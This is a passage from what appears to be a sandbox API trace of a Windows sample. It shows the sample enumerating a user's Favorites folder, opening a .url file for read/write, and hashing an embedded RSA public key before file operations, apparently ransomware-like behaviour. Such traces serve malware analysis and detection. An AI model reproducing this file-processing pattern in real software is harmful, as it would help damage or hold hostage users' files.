hHeap=0x620000) returned 1 [0198.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0198.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.335] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0198.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0198.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94fd8 [0198.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.335] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0198.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94fd8 | out: hHeap=0x620000) returned 1 [0198.335] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0198.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0198.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.336] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0198.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.336] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0198.336] PathFindFileNameW (pszPath="") returned="" [0198.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.336] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0198.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.338] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.338] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0198.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e915e0 [0198.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.338] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Autos.url") returned=".url" [0198.338] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0198.343] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0198.343] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0198.346] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.346] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.348] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.348] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0198.348] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0198.348] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.348] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.348] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0198.350] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0198.350] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.350] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0198.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0198.350] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0198.350] GetLastError () returned 0x0 [0198.350] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0198.350] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0198.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.351] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0198.351] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0198.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.351] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0198.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0198.351] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0198.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0198.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0198.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94fd8 [0198.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f78 [0198.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94f90 [0198.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f90 [0198.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fc0 [0198.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3020 [0198.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fd8 [0198.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0198.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0198.352] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0198.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0198.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0198.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0198.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0198.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3020 [0198.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0198.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fd8 [0198.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0198.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2fc0 [0198.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0198.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0198.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0198.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0198.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0198.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0198.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0198.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0198.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0198.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0198.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0198.356] GetCurrentThreadId () returned 0x66c [0198.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0198.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5ad0 [0198.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0198.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0198.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0198.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.357] GetCurrentThreadId () returned 0x66c [0198.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0198.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0198.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0198.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0198.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0198.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3020 [0198.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0198.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0198.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0198.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fc0 [0198.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0198.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0198.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0198.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0198.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fd8 [0198.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0198.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0198.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0198.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fa8 [0198.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0198.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3038 [0198.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0198.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3008 [0198.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ff0 [0198.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3050 [0198.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ff0 [0198.361] HeapFree (in: 